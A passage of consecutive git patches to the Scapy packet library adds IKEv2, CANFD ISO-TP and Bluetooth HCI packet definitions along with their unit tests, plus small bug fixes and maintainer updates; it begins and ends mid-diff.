IKEv2_Notify(IKEv2_Payload): ShortEnumField("type", 0, IKEv2NotifyMessageTypes), XStrLenField("SPI", "", length_from=lambda pkt: pkt.SPIsize), ConditionalField( - XStrLenField("notify", "", length_from=lambda pkt: pkt.length - 8), + XStrLenField("notify", "", + length_from=lambda pkt: pkt.length - 8 - pkt.SPIsize), lambda pkt: pkt.type not in (16407, 16408) ), ConditionalField( diff --git a/test/contrib/ikev2.uts b/test/contrib/ikev2.uts index 7257ece2741..db503867fc1 100644 --- a/test/contrib/ikev2.uts +++ b/test/contrib/ikev2.uts @@ -1320,6 +1320,121 @@ frames = [ type='MOBIKE_SUPPORTED' ) ), + # CREATE_CHILD_SA request, decrypted + ( + # i: frame number + -4, + # title: + "CREATE_CHILD_SA request, decrypted", + binascii.unhexlify(''.join(""" + 00 50 56 99 bf d5 00 50 56 99 69 93 08 00 45 00 + 01 38 60 32 40 00 40 11 c1 0f 0a 05 02 36 0a 05 + 02 34 b8 99 11 94 01 24 19 a9 00 00 00 00 46 b3 + f6 88 4d 37 5f 9a f5 38 82 35 ea 87 5e 8a 29 20 + 24 00 00 00 00 00 00 00 01 18 + + 21 00 00 0c 03 04 40 09 5f c7 ff 5a 28 00 00 2c + 00 00 00 28 01 03 04 03 6b 21 88 20 03 00 00 0c + 01 00 00 14 80 0e 00 80 03 00 00 08 04 00 00 1c + 00 00 00 08 05 00 00 00 22 00 00 2c ea 7e 88 57 + 4a 36 64 cd 67 e3 3c 42 46 66 59 4d df 70 25 03 + b2 00 a3 3f 87 82 f2 3c 94 c0 60 0e ae 7e d9 50 + d7 67 e9 6e 2c 00 00 48 00 1c 00 00 8e 15 b1 f4 + 9a cc 04 ff 12 e3 2f bc 3a f0 57 14 81 f3 b9 6c + 21 1a f7 36 97 6d c2 23 80 74 ef 75 59 d1 99 65 + 5a a5 80 00 87 4a bf 1f 13 f7 e1 6f de 34 80 94 + 28 1c 93 cb 5a ee 30 24 d9 3e b9 55 2d 00 00 18 + 01 00 00 00 07 00 00 10 00 00 ff ff c0 a8 e1 0b + c0 a8 e1 0b 00 00 00 18 01 00 00 00 07 00 00 10 + 00 00 ff ff c0 a8 e1 00 c0 a8 e1 ff + """.split())), + Ether(dst='00:50:56:99:bf:d5', src='00:50:56:99:69:93', type=2048) /\ + IP(version=4, ihl=5, tos=0, len=312, id=24626, flags=2, frag=0, ttl=64, proto=17, chksum=49423, src='10.5.2.54', dst='10.5.2.52') /\ + UDP(sport=47257, dport=4500, len=292, chksum=6569) /\ + NON_ESP(non_esp=0) /\ + IKEv2( + init_SPI=b'F\xb3\xf6\x88M7_\x9a', + resp_SPI=b'\xf58\x825\xea\x87^\x8a', + next_payload=41, + version=32, + exch_type=36, + flags=0, + id=0, + length=280 + ) /\ + IKEv2_Notify( + next_payload=33, + flags=0, + length=12, + proto=3, + SPIsize=4, + type=16393, + SPI=b'_\xc7\xffZ', + notify=b'' + ) /\ + IKEv2_SA( + prop=IKEv2_Proposal( + trans=( + IKEv2_Transform(next_payload=3, flags=0, length=12, transform_type=1, res2=0, transform_id=20, key_length=128) /\ + IKEv2_Transform(next_payload=3, flags=0, length=8, transform_type=4, res2=0, transform_id=28) /\ + IKEv2_Transform(next_payload=0, flags=0, length=8, transform_type=5, res2=0, transform_id=0) + ), + next_payload=0, flags=0, length=40, proposal=1, proto=3, SPIsize=4, trans_nb=3, SPI=b'k!\x88 '), + next_payload=40, + flags=0, + length=44 + ) /\ + IKEv2_Nonce( + next_payload=34, + flags=0, + length=44, + nonce=b'\xea~\x88WJ6d\xcdg\xe3\xb9U' + ) /\ + IKEv2_TSi( + traffic_selector=[ + IPv4TrafficSelector( + TS_type=7, + IP_protocol_ID=0, + length=16, + start_port=0, + end_port=65535, + starting_address_v4='192.168.225.11', + ending_address_v4='192.168.225.11' + ) + ], + next_payload=45, + flags=0, + length=24, + number_of_TSs=1, + res2=0 + ) /\ + IKEv2_TSr( + traffic_selector=[ + IPv4TrafficSelector( + TS_type=7, + IP_protocol_ID=0, + length=16, + start_port=0, + end_port=65535, + starting_address_v4='192.168.225.0', + ending_address_v4='192.168.225.255' + ) + ], + next_payload=0, + flags=0, + length=24, + number_of_TSs=1, + res2=0 + ) + ), ] From 2dcae1bdc95c70a72e442653de6417b554a7935a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 11 Jun 2023 17:13:16 +0200 Subject: [PATCH 1037/1632] Implement ISOTP packets for CANFD layer (#4022) * Implement ISOTP packets for CANFD layer * fix flake --------- Co-authored-by: Nils Weiss --- scapy/contrib/isotp/__init__.py | 7 +- scapy/contrib/isotp/isotp_packet.py | 128 ++++++++++++++++++++++++++-- test/contrib/isotp_packet.uts | 81 +++++++++++++++--- 3 files changed, 197 insertions(+), 19 deletions(-) diff --git a/scapy/contrib/isotp/__init__.py b/scapy/contrib/isotp/__init__.py index d22b84cc764..142b381ed27 100644 --- a/scapy/contrib/isotp/__init__.py +++ b/scapy/contrib/isotp/__init__.py @@ -13,14 +13,17 @@ from scapy.error import log_loading from scapy.contrib.isotp.isotp_packet import ISOTP, ISOTPHeader, \ - ISOTPHeaderEA, ISOTP_SF, ISOTP_FF, ISOTP_CF, ISOTP_FC + ISOTPHeaderEA, ISOTP_SF, ISOTP_FF, ISOTP_CF, ISOTP_FC, \ + ISOTP_FF_FD, ISOTP_SF_FD, ISOTPHeaderEA_FD, ISOTPHeader_FD from scapy.contrib.isotp.isotp_utils import ISOTPSession, \ ISOTPMessageBuilder from scapy.contrib.isotp.isotp_soft_socket import ISOTPSoftSocket from scapy.contrib.isotp.isotp_scanner import isotp_scan __all__ = ["ISOTP", "ISOTPHeader", "ISOTPHeaderEA", "ISOTP_SF", "ISOTP_FF", - "ISOTP_CF", "ISOTP_FC", "ISOTPSoftSocket", "ISOTPSession", + "ISOTP_CF", "ISOTP_FC", "ISOTP_FF_FD", "ISOTP_SF_FD", + "ISOTPSoftSocket", "ISOTPSession", "ISOTPHeader_FD", + "ISOTPHeaderEA_FD", "ISOTPSocket", "ISOTPMessageBuilder", "isotp_scan", "USE_CAN_ISOTP_KERNEL_MODULE", "log_isotp"] diff --git a/scapy/contrib/isotp/isotp_packet.py b/scapy/contrib/isotp/isotp_packet.py index 391b62ec28c..2eb8a6ff149 100644 --- a/scapy/contrib/isotp/isotp_packet.py +++ b/scapy/contrib/isotp/isotp_packet.py @@ -9,10 +9,12 @@ import struct import logging +from scapy.config import conf from scapy.packet import Packet from scapy.fields import BitField, FlagsField, StrLenField, \ ThreeBytesField, XBitField, ConditionalField, \ - BitEnumField, ByteField, XByteField, BitFieldLenField, StrField + BitEnumField, ByteField, XByteField, BitFieldLenField, StrField, \ + FieldLenField, IntField, ShortField from scapy.compat import chb, orb from scapy.layers.can import CAN from scapy.error import Scapy_Exception @@ -217,6 +219,10 @@ def post_build(self, pkt, pay): """ if self.length is None: pkt = pkt[:4] + chb(len(pay)) + pkt[5:] + + if conf.contribs['CAN']['swap-bytes']: + data = CAN.inv_endianness(pkt) # type: bytes + return data + pay return pkt + pay def guess_payload_class(self, payload): @@ -227,17 +233,65 @@ def guess_payload_class(self, payload): :param payload: payload bytes string :return: Type of payload class """ + if len(payload) < 1: + return self.default_payload_class(payload) + t = (orb(payload[0]) & 0xf0) >> 4 if t == 0: - return ISOTP_SF + length = (orb(payload[0]) & 0x0f) + if length == 0: + return ISOTP_SF_FD + else: + return ISOTP_SF elif t == 1: - return ISOTP_FF + if len(payload) < 2: + return self.default_payload_class(payload) + length = ((orb(payload[0]) & 0x0f) << 12) + orb(payload[1]) + if length == 0: + return ISOTP_FF_FD + else: + return ISOTP_FF elif t == 2: return ISOTP_CF else: return ISOTP_FC +class ISOTPHeader_FD(ISOTPHeader): + name = 'ISOTPHeaderFD' + fields_desc = [ + FlagsField('flags', 0, 3, ['error', + 'remote_transmission_request', + 'extended']), + XBitField('identifier', 0, 29), + ByteField('length', None), + FlagsField('fd_flags', 4, 8, ['bit_rate_switch', + 'error_state_indicator', + 'fd_frame']), + ShortField('reserved', 0), + ] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + + data = super().post_build(pkt, pay) + + length = data[4] + + if 8 < length <= 24: + wire_length = length + (-length) % 4 + elif 24 < length <= 64: + wire_length = length + (-length) % 8 + elif length > 64: + raise NotImplementedError + else: + wire_length = length + + pad = b"\x00" * (wire_length - length) + + return data[0:4] + chb(wire_length) + data[5:] + pad + + class ISOTPHeaderEA(ISOTPHeader): name = 'ISOTPHeaderExtendedAddress' fields_desc = [ @@ -250,7 +304,7 @@ class ISOTPHeaderEA(ISOTPHeader): XByteField('extended_address', 0) ] - def post_build(self, p, pay): + def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes """ This will set the ByteField 'length' to the correct value. @@ -258,8 +312,48 @@ def post_build(self, p, pay): is counted as payload on the CAN layer """ if self.length is None: - p = p[:4] + chb(len(pay) + 1) + p[5:] - return p + pay + pkt = pkt[:4] + chb(len(pay) + 1) + pkt[5:] + + if conf.contribs['CAN']['swap-bytes']: + data = CAN.inv_endianness(pkt) # type: bytes + return data + pay + return pkt + pay + + +class ISOTPHeaderEA_FD(ISOTPHeaderEA): + name = 'ISOTPHeaderExtendedAddressFD' + fields_desc = [ + FlagsField('flags', 0, 3, ['error', + 'remote_transmission_request', + 'extended']), + XBitField('identifier', 0, 29), + ByteField('length', None), + FlagsField('fd_flags', 4, 8, ['bit_rate_switch', + 'error_state_indicator', + 'fd_frame']), + ShortField('reserved', 0), + XByteField('extended_address', 0) + ] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + + data = super().post_build(pkt, pay) + + length = data[4] + + if 8 < length <= 24: + wire_length = length + (-length) % 4 + elif 24 < length <= 64: + wire_length = length + (-length) % 8 + elif length > 64: + raise NotImplementedError + else: + wire_length = length + + pad = b"\x00" * (wire_length - length) + + return data[0:4] + chb(wire_length) + data[5:] + pad ISOTP_TYPE = {0: 'single', @@ -277,17 +371,37 @@ class ISOTP_SF(Packet): ] +class ISOTP_SF_FD(Packet): + name = 'ISOTPSingleFrameFD' + fields_desc = [ + BitEnumField('type', 0, 4, ISOTP_TYPE), + BitField('zero_field', 0, 4), + FieldLenField('message_size', None, length_of='data', fmt="B"), + StrLenField('data', b'', length_from=lambda pkt: pkt.message_size) + ] + + class ISOTP_FF(Packet): name = 'ISOTPFirstFrame' fields_desc = [ BitEnumField('type', 1, 4, ISOTP_TYPE), BitField('message_size', 0, 12), - ConditionalField(BitField('extended_message_size', 0, 32), + ConditionalField(IntField('extended_message_size', 0), lambda pkt: pkt.message_size == 0), StrField('data', b'', fmt="B") ] +class ISOTP_FF_FD(Packet): + name = 'ISOTPFirstFrame' + fields_desc = [ + BitEnumField('type', 1, 4, ISOTP_TYPE), + BitField('zero_field', 0, 12), + IntField('message_size', 0), + StrField('data', b'', fmt="B") + ] + + class ISOTP_CF(Packet): name = 'ISOTPConsecutiveFrame' fields_desc = [ diff --git a/test/contrib/isotp_packet.uts b/test/contrib/isotp_packet.uts index ca490ed1b58..e0225eb09ef 100644 --- a/test/contrib/isotp_packet.uts +++ b/test/contrib/isotp_packet.uts @@ -195,25 +195,19 @@ assert p.type == 1 assert p.identifier == 0 = Build FF frame EA, extended size, with constructor, check for correct length assignments -p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_FF(message_size=0, - extended_message_size=2000, - data=b'\xad'))) +p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_FF_FD(message_size=2000, data=b'\xad'))) assert p.extended_address == 0 assert p.length == 8 -assert p.message_size == 0 -assert p.extended_message_size == 2000 +assert p.message_size == 2000 assert len(p.data) == 1 assert p.data == b'\xad' assert p.type == 1 assert p.identifier == 0 = Build FF frame, extended size, with constructor, check for correct length assignments -p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_FF(message_size=0, - extended_message_size=2000, - data=b'\xad'))) +p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_FF_FD(message_size=2000, data=b'\xad'))) assert p.length == 7 -assert p.message_size == 0 -assert p.extended_message_size == 2000 +assert p.message_size == 2000 assert len(p.data) == 1 assert p.data == b'\xad' assert p.type == 1 @@ -451,3 +445,70 @@ isotpex.show() assert isotpex.data == dhex("AA") assert isotpex.rx_ext_address == 0x02 += Build ISOTP_FF_FD + +pkt = ISOTP_FF_FD(message_size=0xffff0000) +assert bytes(pkt) == bytes.fromhex("1000ffff0000") + += Build ISOTP_SF_FD + +pkt = ISOTP_SF_FD(message_size=0xff) +assert bytes(pkt) == bytes.fromhex("00ff") + += Build ISOTP_FF_FD 2 + +pkt = ISOTPHeaderEA_FD(identifier=0x7ff, extended_address=0xaf)/ISOTP_FF_FD(message_size=0xffff0000) +assert bytes(pkt) == bytes.fromhex("000007ff 07 04 00 00 af 1000ffff0000") + += Build ISOTP_SF_FD 2 + +pkt = ISOTPHeaderEA_FD(identifier=0x7ff, extended_address=0xaf)/ISOTP_SF_FD(message_size=0xff) +assert bytes(pkt) == bytes.fromhex("000007ff 03 04 00 00 af 00ff") + += Build ISOTP_FF_FD 3 + +pkt = ISOTPHeader_FD(identifier=0x7ff)/ISOTP_FF_FD(message_size=0xffff0000) +assert bytes(pkt) == bytes.fromhex("000007ff 06 04 00 00 1000ffff0000") + += Build ISOTP_SF_FD 3 + +pkt = ISOTPHeader_FD(identifier=0x7ff)/ISOTP_SF_FD(message_size=0xff) +assert bytes(pkt) == bytes.fromhex("000007ff 02 04 00 00 00ff") + += Dissect ISOTPFD 1 +pkt = ISOTPHeaderEA_FD(bytes.fromhex("000007ff 07 04 00 00 af 1000ffff0000")) +pkt.show() +sub_pkt = pkt[ISOTP_FF_FD] +assert pkt.identifier == 0x7ff +assert pkt.length == 0x7 +assert pkt.fd_flags == 0x4 +assert pkt.extended_address == 0xaf +assert sub_pkt.message_size == 0xffff0000 + += Dissect ISOTPFD 2 +pkt = ISOTPHeaderEA_FD(bytes.fromhex("000007ff 07 04 00 00 af 00ff00000000")) +pkt.show() +sub_pkt = pkt[ISOTP_SF_FD] +assert pkt.identifier == 0x7ff +assert pkt.length == 0x7 +assert pkt.fd_flags == 0x4 +assert pkt.extended_address == 0xaf +assert sub_pkt.message_size == 0xff + += Dissect ISOTPFD 3 +pkt = ISOTPHeader_FD(bytes.fromhex("000007ff 06 04 00 00 1000ffff0000")) +pkt.show() +sub_pkt = pkt[ISOTP_FF_FD] +assert pkt.identifier == 0x7ff +assert pkt.length == 0x6 +assert pkt.fd_flags == 0x4 +assert sub_pkt.message_size == 0xffff0000 + += Dissect ISOTPFD 4 +pkt = ISOTPHeader_FD(bytes.fromhex("000007ff 06 04 00 00 00ff00000000")) +pkt.show() +sub_pkt = pkt[ISOTP_SF_FD] +assert pkt.identifier == 0x7ff +assert pkt.length == 0x6 +assert pkt.fd_flags == 0x4 +assert sub_pkt.message_size == 0xff \ No newline at end of file From 577ab1f3b2e1f81d1926a0b3dc7b5a0f085ebc1a Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 11 Jun 2023 18:27:37 +0300 Subject: [PATCH 1038/1632] Fix FixedPointField.i2h to accept None (#3999) to make it possible for its derived classes to accept None too. For example ntp.TimeStampField has to be able to handle None to calculate timestamps when packets are assembled. Fixes: ```sh orig : TimeStampField (64 bits) = Traceback (most recent call last): File "", line 2, in File "scapy/packet.py", line 2379, in ls print("%-15r" % (getattr(obj, fname),), end=' ') ^^^^^^^^^^^^^^^^^^^ File "scapy/packet.py", line 469, in __getattr__ return v if isinstance(v, RawVal) else fld.i2h(self, v) ^^^^^^^^^^^^^^^^ File "scapy/fields.py", line 3209, in i2h int_part = val >> self.frac_bits ~~~~^^~~~~~~~~~~~~~~~ TypeError: unsupported operand type(s) for >>: 'NoneType' and 'int' ``` Also closes https://github.com/secdev/scapy/issues/3872 --- scapy/fields.py | 4 +++- test/scapy/layers/ntp.uts | 5 +++++ 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/scapy/fields.py b/scapy/fields.py index d6f632c8dc7..82a8abd7b07 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -3204,8 +3204,10 @@ def any2i(self, pkt, val): return (ival << self.frac_bits) | fract def i2h(self, pkt, val): - # type: (Optional[Packet], int) -> EDecimal + # type: (Optional[Packet], Optional[int]) -> Optional[EDecimal] # A bit of trickery to get precise floats + if val is None: + return val int_part = val >> self.frac_bits pw = 2.0**self.frac_bits frac_part = EDecimal(val & (1 << self.frac_bits) - 1) diff --git a/test/scapy/layers/ntp.uts b/test/scapy/layers/ntp.uts index a76ce4fe3a9..0f9f58a5c9d 100644 --- a/test/scapy/layers/ntp.uts +++ b/test/scapy/layers/ntp.uts @@ -25,18 +25,23 @@ assert not NTPControl in p assert not NTPPrivate in p assert NTP in p assert p.mysummary() == "NTP v4, client" +ls(p) + p = NTPControl() assert not NTPHeader in p assert NTPControl in p assert not NTPPrivate in p assert NTP in p assert p.mysummary() == "NTP v2, NTP control message" +ls(p) + p = NTPPrivate() assert not NTPHeader in p assert not NTPControl in p assert NTPPrivate in p assert NTP in p assert p.mysummary() == "NTP v2, reserved for private use" +ls(p) = NTP - Layers (2) p = NTPHeader() From 92c18f9e60c0959b633589953ce0c53063185ff7 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 17 Jun 2023 01:39:52 +0200 Subject: [PATCH 1039/1632] Fix grammar for codespell 2.2.5 (#4032) --- .config/codespell_ignore.txt | 4 +++- scapy/pipetool.py | 2 +- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index 0ca5b425fbf..f571d4a6568 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -1,4 +1,3 @@ -Ether aci ans archtypes @@ -11,6 +10,7 @@ delt doas doubleclick ether +ether eventtypes fo gost @@ -20,9 +20,11 @@ microsof mitre nd negociate +optiona ot potatoe referer +requestor ro ser singl diff --git a/scapy/pipetool.py b/scapy/pipetool.py index f3278d2a3d4..0034b66fc68 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -606,7 +606,7 @@ def send(self, msg): class PeriodicSource(ThreadGenSource): - """Generage messages periodically on low exit: + """Generate messages periodically on low exit: .. code:: From 1fb14adfc16f84ac3d891ae7b1b63111a3427582 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 21 Jun 2023 09:07:19 +0200 Subject: [PATCH 1040/1632] Added myself to the maintainers --- .github/FUNDING.yml | 2 +- doc/scapy/backmatter.rst | 2 +- pyproject.toml | 1 + 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml index 70258bbec6e..ade501c1b5e 100644 --- a/.github/FUNDING.yml +++ b/.github/FUNDING.yml @@ -1 +1 @@ -github: [gpotter2, guedou, p-l-] +github: [gpotter2, guedou, p-l-, polybassa] diff --git a/doc/scapy/backmatter.rst b/doc/scapy/backmatter.rst index 326083045e4..5c8df340f32 100644 --- a/doc/scapy/backmatter.rst +++ b/doc/scapy/backmatter.rst @@ -4,7 +4,7 @@ Credits ********* - Philippe Biondi is Scapy's author. He has also written most of the documentation. -- Pierre Lalet, Gabriel Potter, Guillaume Valadon are the current most active maintainers and contributors. +- Pierre Lalet, Gabriel Potter, Guillaume Valadon, Nils Weiss are the current most active maintainers and contributors. - Fred Raynal wrote the chapter on building and dissecting packets. - Peter Kacherginsky contributed several tutorial sections, one-liners and recipes. - Dirk Loss integrated and restructured the existing docs to make this book. diff --git a/pyproject.toml b/pyproject.toml index 1c7fe8ce74c..4550f2e9c91 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -12,6 +12,7 @@ maintainers = [ { name="Pierre LALET" }, { name="Gabriel POTTER" }, { name="Guillaume VALADON" }, + { name="Nils Weiss" }, ] license = { text="GPL-2.0-only" } requires-python = ">=3.7, <4" From f359a7e01b65f8516d021f76c6ffa42800234546 Mon Sep 17 00:00:00 2001 From: Gulshan Singh Date: Wed, 21 Jun 2023 13:24:34 -0700 Subject: [PATCH 1041/1632] Add more HCI command and event packets (#4003) --- scapy/layers/bluetooth.py | 56 +++++++++++++++++++++++++++ test/scapy/layers/bluetooth.uts | 68 ++++++++++++++++++++++++++++++++- 2 files changed, 123 insertions(+), 1 deletion(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index c98661eb712..46e4458e1e5 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -32,6 +32,7 @@ LEShortField, LenField, MultipleTypeField, + NBytesField, PacketListField, PadField, SignedByteField, @@ -966,12 +967,46 @@ class HCI_Cmd_LE_Set_Scan_Enable(Packet): ByteField("filter_dups", 1), ] +class HCI_Cmd_Create_Connection(Packet): + name = "Create Connection" + fields_desc = [LEMACField("bd_addr", None), + LEShortField("packet_type", 0xcc18), + ByteField("page_scan_repetition_mode", 0x02), + ByteField("reserved", 0x0), + LEShortField("clock_offset", 0x0), + ByteField("allow_role_switch", 0x1), ] + + class HCI_Cmd_Disconnect(Packet): name = "Disconnect" fields_desc = [XLEShortField("handle", 0), ByteField("reason", 0x13), ] +class HCI_Cmd_Link_Key_Request_Reply(Packet): + name = "Link Key Request Reply" + fields_desc = [LEMACField("bd_addr", None), + NBytesField("link_key", None, 16), ] + + +class HCI_Cmd_Authentication_Requested(Packet): + name = "Authentication Requested" + fields_desc = [LEShortField("handle", 0)] + + +class HCI_Cmd_Set_Connection_Encryption(Packet): + name = "Set Connection Encryption" + fields_desc = [LEShortField("handle", 0), ByteField("encryption_enable", 0)] + + +class HCI_Cmd_Remote_Name_Request(Packet): + name = "Remote Name Request" + fields_desc = [LEMACField("bd_addr", None), + ByteField("page_scan_repetition_mode", 0x02), + ByteField("reserved", 0x0), + LEShortField("clock_offset", 0x0), ] + + class HCI_Cmd_LE_Create_Connection(Packet): name = "LE Create Connection" fields_desc = [LEShortField("interval", 96), @@ -1099,6 +1134,13 @@ def answers(self, other): return self.payload.answers(other) +class HCI_Event_Connect_Complete(Packet): + name = "Connect Complete" + fields_desc = [ByteField("status", 0), + LEShortField("handle", 0x0100), + LEMACField("bd_addr", None), ] + + class HCI_Event_Disconnection_Complete(Packet): name = "Disconnection Complete" fields_desc = [ByteEnumField("status", 0, {0: "success"}), @@ -1106,6 +1148,13 @@ class HCI_Event_Disconnection_Complete(Packet): XByteField("reason", 0), ] +class HCI_Event_Remote_Name_Request_Complete(Packet): + name = "Remote Name Request Complete" + fields_desc = [ByteField("status", 0), + LEMACField("bd_addr", None), + StrFixedLenField("remote_name", b"\x00", 248), ] + + class HCI_Event_Encryption_Change(Packet): name = "Encryption Change" fields_desc = [ByteEnumField("status", 0, {0: "change has occurred"}), @@ -1256,7 +1305,12 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Advertise_Enable, opcode=0x200a) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Scan_Parameters, opcode=0x200b) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Scan_Enable, opcode=0x200c) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Create_Connection, opcode=0x0405) bind_layers(HCI_Command_Hdr, HCI_Cmd_Disconnect, opcode=0x406) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Link_Key_Request_Reply, opcode=0x040b) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Authentication_Requested, opcode=0x0411) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Set_Connection_Encryption, opcode=0x0413) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Remote_Name_Request, opcode=0x0419) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Create_Connection, opcode=0x200d) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Create_Connection_Cancel, opcode=0x200e) # noqa: E501 bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_White_List_Size, opcode=0x200f) @@ -1274,7 +1328,9 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Long_Term_Key_Request_Reply, opcode=0x201a) # noqa: E501 bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Long_Term_Key_Request_Negative_Reply, opcode=0x201b) # noqa: E501 +bind_layers(HCI_Event_Hdr, HCI_Event_Connect_Complete, code=0x3) bind_layers(HCI_Event_Hdr, HCI_Event_Disconnection_Complete, code=0x5) +bind_layers(HCI_Event_Hdr, HCI_Event_Remote_Name_Request_Complete, code=0x07) bind_layers(HCI_Event_Hdr, HCI_Event_Encryption_Change, code=0x8) bind_layers(HCI_Event_Hdr, HCI_Event_Command_Complete, code=0xe) bind_layers(HCI_Event_Hdr, HCI_Event_Command_Status, code=0xf) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 76d1f959422..43f55ac66cc 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -4,8 +4,9 @@ = HCI layers # a huge packet with all classes in it! -pkt = HCI_ACL_Hdr()/HCI_Cmd_Complete_Read_BD_Addr()/HCI_Cmd_Connect_Accept_Timeout()/HCI_Cmd_Disconnect()/HCI_Cmd_LE_Connection_Update()/HCI_Cmd_LE_Create_Connection()/HCI_Cmd_LE_Create_Connection_Cancel()/HCI_Cmd_LE_Host_Supported()/HCI_Cmd_LE_Long_Term_Key_Request_Negative_Reply()/HCI_Cmd_LE_Long_Term_Key_Request_Reply()/HCI_Cmd_LE_Read_Buffer_Size()/HCI_Cmd_LE_Set_Advertise_Enable()/HCI_Cmd_LE_Set_Advertising_Data()/HCI_Cmd_LE_Set_Advertising_Parameters()/HCI_Cmd_LE_Set_Random_Address()/HCI_Cmd_LE_Set_Scan_Enable()/HCI_Cmd_LE_Set_Scan_Parameters()/HCI_Cmd_LE_Start_Encryption_Request()/HCI_Cmd_Read_BD_Addr()/HCI_Cmd_Reset()/HCI_Cmd_Set_Event_Filter()/HCI_Cmd_Set_Event_Mask()/HCI_Command_Hdr()/HCI_Event_Command_Complete()/HCI_Event_Command_Status()/HCI_Event_Disconnection_Complete()/HCI_Event_Encryption_Change()/HCI_Event_Hdr()/HCI_Event_LE_Meta()/HCI_Event_Number_Of_Completed_Packets()/HCI_Hdr()/HCI_LE_Meta_Advertising_Reports()/HCI_LE_Meta_Connection_Complete()/HCI_LE_Meta_Connection_Update_Complete()/HCI_LE_Meta_Long_Term_Key_Request() +pkt = HCI_ACL_Hdr()/HCI_Cmd_Create_Connection()/HCI_Cmd_Complete_Read_BD_Addr()/HCI_Cmd_Connect_Accept_Timeout()/HCI_Cmd_Disconnect()/HCI_Cmd_LE_Connection_Update()/HCI_Cmd_LE_Create_Connection()/HCI_Cmd_LE_Create_Connection_Cancel()/HCI_Cmd_LE_Host_Supported()/HCI_Cmd_LE_Long_Term_Key_Request_Negative_Reply()/HCI_Cmd_LE_Long_Term_Key_Request_Reply()/HCI_Cmd_LE_Read_Buffer_Size()/HCI_Cmd_LE_Set_Advertise_Enable()/HCI_Cmd_LE_Set_Advertising_Data()/HCI_Cmd_LE_Set_Advertising_Parameters()/HCI_Cmd_LE_Set_Random_Address()/HCI_Cmd_LE_Set_Scan_Enable()/HCI_Cmd_LE_Set_Scan_Parameters()/HCI_Cmd_LE_Start_Encryption_Request()/HCI_Cmd_Authentication_Requested()/HCI_Cmd_Link_Key_Request_Reply()/HCI_Cmd_Read_BD_Addr()/HCI_Cmd_Remote_Name_Request()/HCI_Cmd_Reset()/HCI_Cmd_Set_Connection_Encryption()/HCI_Cmd_Set_Event_Filter()/HCI_Cmd_Set_Event_Mask()/HCI_Command_Hdr()/HCI_Event_Command_Complete()/HCI_Event_Command_Status()/HCI_Event_Connect_Complete()/HCI_Event_Disconnection_Complete()/HCI_Event_Encryption_Change()/HCI_Event_Remote_Name_Request_Complete()/HCI_Event_Hdr()/HCI_Event_LE_Meta()/HCI_Event_Number_Of_Completed_Packets()/HCI_Hdr()/HCI_LE_Meta_Advertising_Reports()/HCI_LE_Meta_Connection_Complete()/HCI_LE_Meta_Connection_Update_Complete()/HCI_LE_Meta_Long_Term_Key_Request() assert HCI_ACL_Hdr in pkt.layers() +assert HCI_Cmd_Create_Connection in pkt.layers() assert HCI_Cmd_Complete_Read_BD_Addr in pkt.layers() assert HCI_Cmd_Connect_Accept_Timeout in pkt.layers() assert HCI_Cmd_Disconnect in pkt.layers() @@ -23,15 +24,21 @@ assert HCI_Cmd_LE_Set_Random_Address in pkt.layers() assert HCI_Cmd_LE_Set_Scan_Enable in pkt.layers() assert HCI_Cmd_LE_Set_Scan_Parameters in pkt.layers() assert HCI_Cmd_LE_Start_Encryption_Request in pkt.layers() +assert HCI_Cmd_Authentication_Requested in pkt.layers() +assert HCI_Cmd_Link_Key_Request_Reply in pkt.layers() assert HCI_Cmd_Read_BD_Addr in pkt.layers() +assert HCI_Cmd_Remote_Name_Request in pkt.layers() assert HCI_Cmd_Reset in pkt.layers() +assert HCI_Cmd_Set_Connection_Encryption in pkt.layers() assert HCI_Cmd_Set_Event_Filter in pkt.layers() assert HCI_Cmd_Set_Event_Mask in pkt.layers() assert HCI_Command_Hdr in pkt.layers() assert HCI_Event_Command_Complete in pkt.layers() assert HCI_Event_Command_Status in pkt.layers() +assert HCI_Event_Connect_Complete in pkt.layers() assert HCI_Event_Disconnection_Complete in pkt.layers() assert HCI_Event_Encryption_Change in pkt.layers() +assert HCI_Event_Remote_Name_Request_Complete in pkt.layers() assert HCI_Event_Hdr in pkt.layers() assert HCI_Event_LE_Meta in pkt.layers() assert 